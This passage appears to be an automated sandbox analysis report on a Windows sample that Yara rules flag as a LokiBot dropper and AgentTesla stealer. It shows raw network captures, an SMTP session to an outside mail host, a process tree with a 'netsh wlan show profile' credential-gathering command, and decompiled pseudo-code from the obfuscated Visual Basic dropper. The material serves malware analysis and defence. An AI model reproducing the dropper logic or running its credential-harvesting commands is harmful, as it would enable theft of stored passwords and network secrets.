a9 4a 7e 3b 12 72 a6 ea 33 38 2b 8b e6 df 00 68 c6 83 e6 38 9a da 8f 43 34 c3 02 51 62 7c 7a cc 74 5d 82 e7 41 79 52 47 fb 3e 86 fd db b6 27 eb ee 89 86 fa ad 6b f2 37 25 47 85 f5 08 a8 fe eb a3 39 d3 67 24 a9 24 f2 a3 2c 67 54 a4 4c 0f 5f bb 49 e9 30 3f 0d 0b 32 3e c4 d2 bf 5a 6b 02 5f 08 61 47 d1 17 17 cc 36 ff ee 35 8a 1f 20 82 66 f3 e1 3d f3 c0 f3 10 b6 e6 fc e0 7b c9 ef 48 0a 4f dd f7 3c ea a7 f4 21 59 e8 19 61 69 4f 90 1c f5 81 18 60 e6 c3 31 3a Data Ascii: :_8XZ4%^"+s-oobZ"&qswWtOq4m7[bCg=2J<drW-\NdC{vEF}_fRkQ1~rcVl(OQ>te,BA,mY}}"S6ZOz2oF0V"8iU~"&]zGnm\$'7!/YuZ48jJ%s<hY%dJw;Hux+t`W2Q\NdC{vAJ}_fRkQ1\|KmebdniqsTB-=laPG^<?;bzoV0V:auP{]zgj'DM\$'7!SJjYp48,.%s,hY5tCJw;Hux,?(rWiNC{vEF}_fOh?`rWQ\NdC{vAH;)Goi`}B&?~jtx'G#v9b,u'Jyd9`2Xr}feXp)u#\U{ul)>/O3?z4u,(M8vm(.-?"n-k]D:Dq{D7KIh9vLOY/"UpAOq~p]_RYSai +}Zj2J~;r38+h8C4Qb\|zt]AyRG>'k7%G9g$$,gTL_I0?2>Zk_aG65 f={HO<!YaiO`1:
Apr 22, 2020 21:58:16.194391966 CEST	4949	IN	Data Raw: 59 63 c8 07 f0 9c 26 42 d7 22 03 25 18 27 db c9 91 71 39 e7 58 64 b9 5e 88 03 33 e9 11 90 35 0e b2 c2 d1 a6 2a 75 2b f6 8a 63 19 62 f8 0f 91 22 c7 4e db 68 6c e9 b9 1a bd 05 02 93 cd 4e 09 b7 0f bd eb 61 73 3e f2 2c 14 ee d5 ac 4a 25 56 a6 8a 05 Data Ascii: Yc&B"%'q9Xd^35*u+cb"NhlNas>,J%V]=8Y/?qEw5i0"$,l%$<.,eFE+OaXE=J12(xKkY)tTrEzX-my[K _HH8;,A@l;Py
Apr 22, 2020 21:58:16.194633961 CEST	4951	IN	Data Raw: 25 4e 22 60 b6 7e 2e 1c e2 51 24 3c 21 23 b3 91 ce 56 5f fe 2c 1c c0 d9 ff a8 af 14 7e e0 fb c9 2a bc 55 85 9a 77 58 fa 90 36 86 d9 26 a7 18 81 96 08 54 11 90 25 ff a8 29 ad 3d a0 29 c3 23 03 37 3a a4 22 46 e8 58 9b 0f 37 c8 84 a6 da 05 dc 34 83 Data Ascii: %N"`~.Q$<!#V_,~UwX6&T%)=)#7:"FX74f+`I&hB#KY,%:Io{4?sHu2^o] 5^}sh7*dk%Pv}=KiPPJex(i[E3dR{"
Apr 22, 2020 21:58:16.194650888 CEST	4952	IN	Data Raw: b3 50 59 2b e0 a7 b3 ca fc 06 6c 2d 65 63 d9 79 cb 0d e8 72 a8 46 80 70 d3 86 d3 4f 9b 85 48 6d ee 09 76 56 b4 34 09 72 17 11 7a b3 00 54 6d 18 8a 20 16 d2 25 37 2d 0b 71 89 6e a7 3d e8 c7 36 78 e8 52 f5 a6 ab 2d 93 0b a2 c7 81 23 a9 e3 44 a3 db Data Ascii: PY+l-ecyrFpOHmvV4rzTm %7-qn=6xR-#DjpNb]<wB'FeFL`S`Qhxl-j5?@&D#\oN}py:0zjC*15\4hL2t9lW~Fu5!
Apr 22, 2020 21:58:16.194844961 CEST	4954	IN	Data Raw: 42 8e 60 e9 ba 2e 59 3b 5d 7b fd 68 ce db a2 e7 b9 14 b3 d9 e6 e9 aa 0f 6b 5c 8b 66 8f 87 dd 87 21 d2 6f 5c 77 8f f7 5c 1d 78 61 df 23 63 ab 83 be eb 79 34 f8 a2 01 42 3b 0a 2b 52 90 19 f4 af f9 ef fa 1c 1f c6 51 e6 2f da e4 03 f3 d3 79 8b a9 68 Data Ascii: B`.Y;]{hk\f!o\w\xa#cy4B;+RQ/yhm3DB(&Y32lHJ{;b}zu903C* OBSKw\F6{kg7:Gfv:\|W$*AQ\{@+q!\(D5Kd,oZ]Tg\`
Apr 22, 2020 21:58:16.194952965 CEST	4955	IN	Data Raw: f6 49 74 e8 6d b6 6b 07 ea ad 41 54 7e 32 c6 5a 2c 59 4f bf 7f 7f 5c 4b df ab 1f 78 24 49 c0 8a 9c 9d 95 2e 95 6c ee e0 fb c3 64 18 c0 6c 5b 1e 3a bb da 8d fa ed ab 43 43 fc 47 2b 00 e7 87 4e cc 11 df 30 6f f3 2c d5 54 2b 3e 7e 52 71 ec 7e da 3a Data Ascii: ItmkAT~2Z,YO\Kx$I.ldl[:CCG+N0o,T+>~Rq~:e`gEPaQ\=t84-n;j.~qNReyLypd$E\|[3p@1qoJFRu6pYf7;L\|7rDKn8O(u \&G$n%!b@=:p
Apr 22, 2020 21:58:16.195055962 CEST	4957	IN	Data Raw: 20 6e 93 1f 88 df 22 55 ac 37 f2 ba 52 09 77 de 8d 3d cf 1e 45 98 72 b7 4c 4b d3 d5 57 fc c9 9f 30 f7 78 c1 4c 26 79 72 e9 0d d9 73 42 03 fe 61 d4 0e f2 66 1f 1c 92 7f e0 60 04 ba 45 ad c9 8c 24 0e 1f 15 2c 25 06 1f 61 81 cc 36 89 c6 0c f4 a9 6f Data Ascii: n"U7Rw=ErLKW0xL&yrsBaf`E$,%a6oJs!KWy +mbT"\R?&;Q!,G3BBxn+1$1_q@r5:6>Wj%Wk_\|3%$M-c3eWY0lGem8
Apr 22, 2020 21:58:16.195121050 CEST	4958	IN	Data Raw: 4a 0d 30 91 35 c4 c1 33 1f ad 29 72 ab ce e1 2d 82 0a 84 53 2e e0 43 83 56 90 7a 8d d7 69 b1 88 fe 8d 50 09 04 f5 83 ea 9f 45 dc 4b a9 58 ee 72 78 db 81 d7 1d b7 df 5e c9 aa 03 19 98 bf c9 ed c7 57 a9 63 73 bb 2d e4 47 33 ca 54 9d 44 64 9d 31 33 Data Ascii: J053)r-S.CVziPEKXrx^Wcs-G3TDd13bPyj[,2gz}eM;m-a$^G+/NjymQ.knRJ94OiPAQJ0".'anhviA>#&-#c(
Apr 22, 2020 21:58:16.195241928 CEST	4959	IN	Data Raw: 1a 0a 3b 76 c5 af 40 52 95 11 51 2f 29 da 42 15 3e a1 bd fa 02 52 e3 7a 52 f0 13 8e 4a 15 6b 2c b1 ed 61 a5 c0 be b9 29 d1 45 ee 1e 1f 1d 57 a5 58 ad 57 f4 95 2d b3 a2 92 8d 06 02 69 ce ad 4c 11 e3 dd bb 1b ee 4b 76 bb 53 68 25 4a 00 f8 a8 04 f5 Data Ascii: ;v@RQ/)B>RzRJk,a)EWXW-iLKvSh%J?:xWmSY<H6j-("}ftOK$LlDg 4Cu=Ddo7\|a)`<g%Y.7llahH~p*fYK(42{5{f{8
Apr 22, 2020 21:58:16.195334911 CEST	4961	IN	Data Raw: 22 2c 6e e1 81 dc 10 74 d1 15 56 6b 16 31 e4 2d 33 10 9e 95 61 17 18 8d a6 08 e0 94 42 5e cc b3 6a a0 4b 57 e6 06 8f fe c0 87 56 f1 1b ee b9 98 7a 7e 94 15 a2 9e 54 a5 c8 d1 2f c4 c2 00 7a 60 ca 07 6f 94 97 9c 18 3d 15 dc e7 a6 c4 d2 df 32 6f 23 Data Ascii: ",ntVk1-3aB^jKWVz~T/z`o=2o#xN-rO^4&s{gXgqPaPqPR-%<N\|0?_"Em2;4RG?D*&#i\lesbuOGJY:kf
Apr 22, 2020 21:58:16.296952009 CEST	4962	IN	Data Raw: 01 e0 29 3c 13 ac 9c a9 33 a9 51 ab a2 90 69 2f 9a 13 b4 ce 8a 06 f9 50 ad 5d b1 0d 00 fb b8 57 e4 ec 59 6f 65 e9 7f 77 ea 34 04 6a 17 69 7b 2f 03 0b ed a8 38 19 52 0f da 46 be ce 97 7d ff 6c a8 8a 21 5b 9a 77 5a 0e fa bd 49 70 6d d7 f7 9f 4d 75 Data Ascii: )<3Qi/P]WYoew4ji{/8RF}l![wZIpmMuCc_$}F%396vDQ=6Z&bO#LV2zNrI&)B}psAr4EbZF~mnxmgUpj\Ux55$Lr-

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 22, 2020 21:58:48.551398993 CEST	587	49771	208.91.199.223	192.168.0.80	220 us2.outbound.mailhostbox.com ESMTP Postfix
Apr 22, 2020 21:58:48.552267075 CEST	49771	587	192.168.0.80	208.91.199.223	EHLO 332260
Apr 22, 2020 21:58:48.694683075 CEST	587	49771	208.91.199.223	192.168.0.80	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Apr 22, 2020 21:58:48.695025921 CEST	49771	587	192.168.0.80	208.91.199.223	STARTTLS
Apr 22, 2020 21:58:48.837642908 CEST	587	49771	208.91.199.223	192.168.0.80	220 2.0.0 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: bF7H5z6B1q.exe PID: 2608 Parent PID: 5008

General

Start time:	21:58:04
Start date:	22/04/2020
Path:	C:\Users\user\Desktop\bF7H5z6B1q.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\bF7H5z6B1q.exe'
Imagebase:	0x400000
File size:	212992 bytes
MD5 hash:	87E74AF7016E8A9B9304DC537FA093DA
Has administrator privileges:	false
Programmed in:	Visual Basic
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 00000003.00000000.15658304569.0000000000415000.00000020.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18_RID328F, Description: Semiautomatic generated rule - file scan copy.pdf.r11, Source: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 5096 Parent PID: 2608

General

Start time:	21:58:13
Start date:	22/04/2020
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\bF7H5z6B1q.exe'
Imagebase:	0xd50000
File size:	53248 bytes
MD5 hash:	6AFAE79556E125202DCF1D3FE74A3638
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.16909660570.000000001FED0000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.16911083237.000000002001C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.16909949970.000000001FF28000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6900 Parent PID: 5096

General

Start time:	21:58:13
Start date:	22/04/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60d4f0000
File size:	822272 bytes
MD5 hash:	C221707E5CE93515AC87507E19181E2A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: netsh.exe PID: 7048 Parent PID: 5096

General

Start time:	21:58:44
Start date:	22/04/2020
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	'netsh' wlan show profile
Imagebase:	0x13f0000
File size:	82432 bytes
MD5 hash:	847B74DC766070B0FAD7DABF0B239999
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 3904 Parent PID: 7048

General

Start time:	21:58:44
Start date:	22/04/2020
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff60d4f0000
File size:	822272 bytes
MD5 hash:	C221707E5CE93515AC87507E19181E2A
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: bF7H5z6B1q.exe PID: 2608 Parent PID: 5008 bF7H5z6B1q.exeUNIQUE

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0.8%
Signature Coverage:	0.5%
Total number of Nodes:	387
Total number of Limit Nodes:	32

Executed Functions

Function 004018FC, Relevance: 5.5, APIs: 1, Strings: 1, Instructions: 2037COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401901

Strings

VB5!6&*, xrefs: 004018FC

Memory Dump Source

Source File: 00000003.00000002.15788416137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.15788348069.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.15788608764.0000000000415000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.15788780967.0000000000432000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.15788833807.0000000000433000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_bF7H5z6B1q.jbxd

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 810bfaf561c409e4200b9f42d75e22fcc443706f8d39d151967b1241e97edeaa
Instruction ID: 233ad91723eeb9545993a528c7d3637d170be61ea297259ebe599ccf2377b460
Opcode Fuzzy Hash: 810bfaf561c409e4200b9f42d75e22fcc443706f8d39d151967b1241e97edeaa
Instruction Fuzzy Hash: C2C2BA7144E3C18FC7138B709E6A5A27FB4EE1331471D05DFC8C19A1A3E22C6A6AD766

Uniqueness

Uniqueness Score: 1.28%

Function 0042DF4F, Relevance: 80.9, APIs: 41, Strings: 5, Instructions: 385
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E0042DF4F(void* __ebx, void* __edi, void* __esi, signed int __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				long long _v36;
				void* _v52;
				char _v56;
				signed int _v60;
				char _v64;
				signed int _v72;
				signed int _v80;
				char _v96;
				signed int _v120;
				char _v128;
				signed int _v132;
				char _v136;
				char _v140;
				char _v148;
				long long _v156;
				signed int _v160;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _t189;
				signed int _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				signed int _t206;
				char* _t211;
				signed short _t220;
				signed short _t224;
				char* _t226;
				signed int _t230;
				void* _t232;
				signed int _t235;
				signed int _t239;
				char* _t243;
				signed int _t251;
				signed int* _t256;
				char* _t263;
				void* _t277;
				void* _t279;
				intOrPtr _t280;
				signed int* _t281;
				signed int* _t282;
				signed int _t286;
				signed int _t296;

				_t296 = __fp0;
				_t280 = _t279 - 0xc;
				 *[fs:0x0] = _t280;
				L00401740();
				_v16 = _t280;
				_v12 = 0x4014b8;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0x000000fe;
				_t189 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401746, _t277);
				_push(0x4263b8);
				_push(0x4263c0);
				L004018C0();
				_v72 = _t189;
				_v80 = 8;
				_push( &_v80);
				_push( &_v96);
				L004018C6();
				_v120 = _v120 & 0x00000000;
				_v128 = 0x8008;
				_push( &_v96);
				_t193 =  &_v128;
				_push(_t193);
				L004018CC();
				_v160 = _t193;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L004018BA();
				_t281 = _t280 + 0xc;
				_t196 = _v160;
				if(_t196 != 0) {
					if( *0x432400 != 0) {
						_v188 = 0x432400;
					} else {
						_push(0x432400);
						_push(0x4263e8);
						L004018B4();
						_v188 = 0x432400;
					}
					_v160 =  *_v188;
					_t251 =  *((intOrPtr*)( *_v160 + 0x1c))(_v160,  &_v60);
					asm("fclex");
					_v164 = _t251;
					if(_v164 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x4263d8);
						_push(_v160);
						_push(_v164);
						L004018AE();
						_v192 = _t251;
					}
					_v168 = _v60;
					_t196 =  *((intOrPtr*)( *_v168 + 0x50))(_v168);
					asm("fclex");
					_v172 = _t196;
					_t286 = _v172;
					if(_t286 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x50);
						_push(0x4263f8);
						_push(_v168);
						_push(_v172);
						L004018AE();
						_v196 = _t196;
					}
					_t256 =  &_v60;
					L004018A8();
				}
				asm("fld1");
				_push(_t256);
				_push(_t256);
				_v72 = _t296;
				asm("fld1");
				_push(_t256);
				_push(_t256);
				_v80 = _t296;
				asm("fld1");
				_push(_t256);
				_push(_t256);
				 *_t281 = _t296;
				_push(_t256);
				_push(_t256);
				_v96 =  *0x4014b0;
				L004018A2();
				asm("fcomp qword [0x4014a8]");
				asm("fnstsw ax");
				asm("sahf");
				if(_t286 != 0) {
					_t239 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v60);
					asm("fclex");
					_v160 = _t239;
					if(_v160 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x425bb4);
						_push(_a4);
						_push(_v160);
						L004018AE();
						_v200 = _t239;
					}
					if( *0x432400 != 0) {
						_v204 = 0x432400;
					} else {
						_push(0x432400);
						_push(0x4263e8);
						L004018B4();
						_v204 = 0x432400;
					}
					_v164 =  *_v204;
					_v184 = _v60;
					_v60 = _v60 & 0x00000000;
					_t243 =  &_v64;
					L0040189C();
					_t196 =  *((intOrPtr*)( *_v164 + 0x40))(_v164, _t243, _t243, _v184, L"N174");
					asm("fclex");
					_v168 = _t196;
					if(_v168 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x4263d8);
						_push(_v164);
						_push(_v168);
						L004018AE();
						_v208 = _t196;
					}
					L004018A8();
				}
				_push(0x42641c);
				_push("2/2");
				L004018C0();
				_v72 = _t196;
				_v80 = 8;
				_push( &_v80);
				_push( &_v96); // executed
				L00401890(); // executed
				_v120 = 2;
				_v128 = 0x8002;
				_push( &_v96);
				_t200 =  &_v128;
				_push(_t200);
				L00401896();
				_v160 = _t200;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L004018BA();
				_t282 =  &(_t281[3]);
				_t203 = _v160;
				if(_t203 != 0) {
					_push(0xb5);
					L00401884();
					_v120 = _t203;
					_v128 = 3;
					L0040188A();
				}
				_push(0x425e2c);
				_push(0x426438);
				L004018C0();
				L00401872();
				_push(_t203);
				L00401878();
				_push(_t203);
				_push( &_v80);
				L0040187E();
				_v120 = 0x426440;
				_v128 = 0x8008;
				_push( &_v80);
				_t206 =  &_v128;
				_push(_t206);
				L00401896();
				_v160 = _t206;
				L004018D2();
				L0040186C();
				if(_v160 != 0) {
					_t235 =  *((intOrPtr*)( *_a4 + 0x900))(_a4);
					_v160 = _t235;
					if(_v160 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x900);
						_push(0x425be4);
						_push(_a4);
						_push(_v160);
						L004018AE();
						_v212 = _t235;
					}
				}
				L004018D8();
				_v132 = _v132 & 0x00000000;
				_v140 = 0x7821f7;
				_v136 = 0x2ae08a;
				_t211 =  &_v136;
				L00401866();
				 *((intOrPtr*)( *_a4 + 0x904))(_a4, _t211, _t211, 0x4bc0b530, 0x5b03,  &_v140, 0xffffffff,  &_v132,  &_v56);
				L004018D2();
				_v148 =  *0x4014a0;
				_t263 =  &_v56;
				L004018D8();
				_v192 =  *0x401498;
				_v208 =  *0x401490;
				_t220 =  *((intOrPtr*)( *_a4 + 0x7c8))(_a4,  &_v56, L"rdsZNFSH6I4jVuhstcmQDXwblPfl8XwEZgi121", _t263, _t263,  &_v148, 0xffffffff, _t263,  &_v156);
				_v160 = _t220;
				if(_v160 >= 0) {
					_v216 = _v216 & 0x00000000;
				} else {
					_push(0x7c8);
					_push(0x425be4);
					_push(_a4);
					_push(_v160);
					L004018AE();
					_v216 = _t220;
				}
				_v36 = _v156;
				L004018D2();
				L00401866();
				_v132 = _t220;
				 *_t282 =  *0x401488;
				_t224 =  *((intOrPtr*)( *_a4 + 0x7cc))(_a4,  &_v132, 0xf6, 0xf6);
				_v160 = _t224;
				if(_v160 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x7cc);
					_push(0x425be4);
					_push(_a4);
					_push(_v160);
					L004018AE();
					_v220 = _t224;
				}
				_v136 =  *0x401484;
				L00401866();
				_v132 = _t224;
				_t226 =  &_v136;
				L00401866();
				_t230 =  *((intOrPtr*)( *_a4 + 0x7d0))(_a4,  &_v132, 0x43fd, _t226, _t226, 0,  &_v140);
				_v160 = _t230;
				if(_v160 >= 0) {
					_v224 = _v224 & 0x00000000;
				} else {
					_push(0x7d0);
					_push(0x425be4);
					_push(_a4);
					_push(_v160);
					L004018AE();
					_v224 = _t230;
				}
				_v28 = _v140;
				_t232 = E00431385(0x56); // executed
				_v8 = 0;
				asm("wait");
				_push(0x42e578);
				L0040186C();
				return _t232;
			}

0x0042df4f
0x0042df52
0x0042df61
0x0042df6d
0x0042df75
0x0042df78
0x0042df85
0x0042df8d
0x0042df98
0x0042df9b
0x0042dfa0
0x0042dfa5
0x0042dfaa
0x0042dfad
0x0042dfb7
0x0042dfbb
0x0042dfbc
0x0042dfc1
0x0042dfc5
0x0042dfcf
0x0042dfd0
0x0042dfd3
0x0042dfd4
0x0042dfd9
0x0042dfe3
0x0042dfe7
0x0042dfe8
0x0042dfea
0x0042dfef
0x0042dff2
0x0042dffb
0x0042e008
0x0042e025
0x0042e00a
0x0042e00a
0x0042e00f
0x0042e014
0x0042e019
0x0042e019
0x0042e037
0x0042e04f
0x0042e052
0x0042e054
0x0042e061
0x0042e083
0x0042e063
0x0042e063
0x0042e065
0x0042e06a
0x0042e070
0x0042e076
0x0042e07b
0x0042e07b
0x0042e08d
0x0042e0a1
0x0042e0a4
0x0042e0a6
0x0042e0ac
0x0042e0b3
0x0042e0d5
0x0042e0b5
0x0042e0b5
0x0042e0b7
0x0042e0bc
0x0042e0c2
0x0042e0c8
0x0042e0cd
0x0042e0cd
0x0042e0dc
0x0042e0df
0x0042e0df
0x0042e0e4
0x0042e0e6
0x0042e0e7
0x0042e0e8
0x0042e0eb
0x0042e0ed
0x0042e0ee
0x0042e0ef
0x0042e0f2
0x0042e0f4
0x0042e0f5
0x0042e0f6
0x0042e0ff
0x0042e100
0x0042e101
0x0042e104
0x0042e109
0x0042e10f
0x0042e111
0x0042e112
0x0042e124
0x0042e12a
0x0042e12c
0x0042e139
0x0042e15b
0x0042e13b
0x0042e13b
0x0042e140
0x0042e145
0x0042e148
0x0042e14e
0x0042e153
0x0042e153
0x0042e169
0x0042e186
0x0042e16b
0x0042e16b
0x0042e170
0x0042e175
0x0042e17a
0x0042e17a
0x0042e198
0x0042e1a1
0x0042e1a7
0x0042e1b6
0x0042e1ba
0x0042e1ce
0x0042e1d1
0x0042e1d3
0x0042e1e0
0x0042e202
0x0042e1e2
0x0042e1e2
0x0042e1e4
0x0042e1e9
0x0042e1ef
0x0042e1f5
0x0042e1fa
0x0042e1fa
0x0042e20c
0x0042e20c
0x0042e211
0x0042e216
0x0042e21b
0x0042e220
0x0042e223
0x0042e22d
0x0042e231
0x0042e232
0x0042e237
0x0042e23e
0x0042e248
0x0042e249
0x0042e24c
0x0042e24d
0x0042e252
0x0042e25c
0x0042e260
0x0042e261
0x0042e263
0x0042e268
0x0042e26b
0x0042e274
0x0042e276
0x0042e27b
0x0042e280
0x0042e283
0x0042e290
0x0042e290
0x0042e295
0x0042e29a
0x0042e29f
0x0042e2a9
0x0042e2ae
0x0042e2af
0x0042e2b4
0x0042e2b8
0x0042e2b9
0x0042e2be
0x0042e2c5
0x0042e2cf
0x0042e2d0
0x0042e2d3
0x0042e2d4
0x0042e2d9
0x0042e2e3
0x0042e2eb
0x0042e2f9
0x0042e303
0x0042e309
0x0042e316
0x0042e338
0x0042e318
0x0042e318
0x0042e31d
0x0042e322
0x0042e325
0x0042e32b
0x0042e330
0x0042e330
0x0042e316
0x0042e347
0x0042e34c
0x0042e351
0x0042e35b
0x0042e380
0x0042e38b
0x0042e399
0x0042e3a2
0x0042e3ad
0x0042e3b8
0x0042e3bb
0x0042e3ce
0x0042e3e2
0x0042e3f6
0x0042e3fc
0x0042e409
0x0042e42b
0x0042e40b
0x0042e40b
0x0042e410
0x0042e415
0x0042e418
0x0042e41e
0x0042e423
0x0042e423
0x0042e438
0x0042e43e
0x0042e447
0x0042e44c
0x0042e457
0x0042e466
0x0042e46c
0x0042e479
0x0042e49b
0x0042e47b
0x0042e47b
0x0042e480
0x0042e485
0x0042e488
0x0042e48e
0x0042e493
0x0042e493
0x0042e4a8
0x0042e4b2
0x0042e4b7
0x0042e4c3
0x0042e4ce
0x0042e4e5
0x0042e4eb
0x0042e4f8
0x0042e51a
0x0042e4fa
0x0042e4fa
0x0042e4ff
0x0042e504
0x0042e507
0x0042e50d
0x0042e512
0x0042e512
0x0042e527
0x0042e52a
0x0042e52f
0x0042e536
0x0042e537
0x0042e572
0x0042e577

APIs

__vbaChkstk.MSVBVM60(?,00401746), ref: 0042DF6D
__vbaStrCat.MSVBVM60(004263C0,004263B8,?,?,?,?,00401746), ref: 0042DFA5
#666.MSVBVM60(?,00000008), ref: 0042DFBC
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0042DFD4
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042DFEA
__vbaNew2.MSVBVM60(004263E8,00432400,?,?,00401746), ref: 0042E014
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,0000001C), ref: 0042E076
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263F8,00000050), ref: 0042E0C8
__vbaFreeObj.MSVBVM60(00000000,?,004263F8,00000050), ref: 0042E0DF
#672.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00401746), ref: 0042E104
__vbaHresultCheckObj.MSVBVM60(00000000,004014B8,00425BB4,00000160), ref: 0042E14E
__vbaNew2.MSVBVM60(004263E8,00432400), ref: 0042E175
__vbaObjSet.MSVBVM60(?,?,N174), ref: 0042E1BA
__vbaHresultCheckObj.MSVBVM60(00000000,?,004263D8,00000040), ref: 0042E1F5
__vbaFreeObj.MSVBVM60(00000000,?,004263D8,00000040), ref: 0042E20C
__vbaStrCat.MSVBVM60(2/2,0042641C,?,?,?,?,?,?,?,?,?,?,00401746), ref: 0042E21B
#545.MSVBVM60(?,00000008), ref: 0042E232
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 0042E24D
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,00008002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0042E263
#568.MSVBVM60(000000B5,?,?,?,?,?,00401746), ref: 0042E27B
__vbaVarMove.MSVBVM60 ref: 0042E290
__vbaStrCat.MSVBVM60(00426438,00425E2C,?,?,?,?,?,00401746), ref: 0042E29F
__vbaStrMove.MSVBVM60(00426438,00425E2C,?,?,?,?,?,00401746), ref: 0042E2A9
__vbaI4Str.MSVBVM60(00000000,00426438,00425E2C,?,?,?,?,?,00401746), ref: 0042E2AF
#608.MSVBVM60(?,00000000,00000000,00426438,00425E2C,?,?,?,?,?,00401746), ref: 0042E2B9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0042E2D4
__vbaFreeStr.MSVBVM60(00008008,?), ref: 0042E2E3
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0042E2EB
__vbaHresultCheckObj.MSVBVM60(00000000,004014B8,00425BE4,00000900), ref: 0042E32B
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0042E347
__vbaUI1I2.MSVBVM60(002AE08A,4BC0B530,00005B03,?,000000FF,00000000,00000000,00008008,?), ref: 0042E38B
__vbaFreeStr.MSVBVM60 ref: 0042E3A2
__vbaStrCopy.MSVBVM60 ref: 0042E3BB
__vbaHresultCheckObj.MSVBVM60(00000000,004014B8,00425BE4,000007C8,?,?,?,?,?,000000FF,?,?), ref: 0042E41E
__vbaFreeStr.MSVBVM60(00000000,004014B8,00425BE4,000007C8,?,?,?,?,?,000000FF,?,?), ref: 0042E43E
__vbaUI1I2.MSVBVM60(00000000,004014B8,00425BE4,000007C8,?,?,?,?,?,000000FF,?,?), ref: 0042E447
